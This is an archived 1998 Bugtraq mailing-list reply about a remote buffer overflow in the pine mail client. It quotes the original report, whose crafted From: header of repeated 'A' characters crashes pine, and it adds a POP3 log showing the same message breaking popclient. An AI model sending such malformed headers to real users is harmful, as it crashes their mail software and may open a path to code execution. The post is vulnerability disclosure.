[6990] in bugtraq
Re: another remote pine vunerability
daemon@ATHENA.MIT.EDU (Phillip R. Jaenke)
Thu Jun 18 15:51:44 1998
Date: Thu, 18 Jun 1998 14:46:00 -0400
Reply-To: "Phillip R. Jaenke" <prj@nls.net>
From: "Phillip R. Jaenke" <prj@NLS.NET>
X-To: Michal Zalewski <lcamtuf@BOSS.STASZIC.WAW.PL>
To: BUGTRAQ@NETSPACE.ORG
In-Reply-To: <Pine.LNX.3.96.980617164950.707A-100000@ppp2-cst105.warszawa.tpnet.pl>
On Wed, 17 Jun 1998, Michal Zalewski wrote:
> Recently I found silly remote overflow in pine. It's so simple there's no
> need to describe it:
>
> From: Michal Zalewski <lcamtuf@AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA!
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
> AAAAAAAAAAAAAAA>
>
> ...and any attempt of reading this mail will cause:
>
> Program received signal SIGSEGV, Segmentation fault.
> 0x41414141 in ?? ()
Also, attempting to so much as download *THIS* email I'm quoting here will
cause a panic in 'popclient.' pine is fine, but popclient can't retrieve
email past this message.
> RETR 9
+OK 3897 octets.
(56 lines of message content)
> DELE 1094795585
doPOP3: cleanUp: Bad file descriptor
The only way to get rid of the offending message is by hand. I'd say we've
stumbled on to something that could be rather painful.
--Phillip R. Jaenke (prj@nls.net - InterNIC: PRJ5)
Head Geek, Linux@Comdex Project - http://comdex.linuxos.org/
TheGuyInCharge(tm), Ketyra Designs, Inc.
"For every step I take, I find somebody stepping on my heels." --anonymous
"That's IT! I'm gonna slap Dr.Watson with a malpractice suit!!" --Keihra
! I reserve the right to bill spammers for my time and disk space !
